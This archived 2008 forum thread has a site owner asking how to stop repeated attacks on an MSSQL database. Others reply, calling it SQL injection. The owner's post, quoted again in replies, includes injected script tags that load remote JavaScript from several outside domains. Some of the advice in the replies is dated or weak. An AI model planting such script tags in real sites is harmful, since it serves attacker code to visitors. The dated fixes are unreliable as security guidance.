PDA

View Full Version : How to prevent hacking the databas by entering javascript


kjomyjose
07-18-2008, 12:38 PM
Four times my MSSQL Server hacked. Somebody inserts most of the tables text, varchar fields with its value adding at the end with<script src=http://www.pyttco.com/ngg.js></script>

I changed my ftp usernamd and password, database username and password. Still they are able to insert different scripts like

<script src=http://www.cdport.eu/ngg.js></script>
<script src=http://www.drvadw.com/ngg.js></script>
<script src=http://www.bnrc.ru/ngg.js></script>

This is a virous.

I spoke to my hosting company, they are saying they are not providing any security for hacking.

Anybody can tell how can I prevent this.

Thanks
Dravu
07-18-2008, 02:43 PM
Four times my MSSQL Server hacked. Somebody inserts most of the tables text, varchar fields with its value adding at the end with<script src=http://www.pyttco.com/ngg.js></script>

I changed my ftp usernamd and password, database username and password. Still they are able to insert different scripts like

<script src=http://www.cdport.eu/ngg.js></script>
<script src=http://www.drvadw.com/ngg.js></script>
<script src=http://www.bnrc.ru/ngg.js></script>

This is a virous.

I spoke to my hosting company, they are saying they are not providing any security for hacking.

Anybody can tell how can I prevent this.

Thanks
That's SQL injection and further-more not filtering your output. Changing passwords won't help against that. It's a security hole in your coding. What script are you using that deals with those tables?
tsiou
07-18-2008, 08:59 PM
Four times my MSSQL Server hacked.

Do you mean MySQL?

If it's MSSQL go on with MySQL and linux :)
If you own the server try to install mod_security for apache
If you have forms like newsletter try to check with php functions
like stripslashes, htmlentities, eregi and some if else.
nobaloney
07-20-2008, 11:36 AM
Four times my MSSQL Server hacked.
Are you asking about the Microsoft product MSSQL, or the open source product MySQL?

If the Microsoft product, then you won't really get too much help here; this is a forum for owners/users of the DirectAdmin control panel, running on Linux and on FreeBSD. I doubt too many of us have any strong experience in MSSQL, and even if we did, this would be the wrong place for the discussion.

Jeff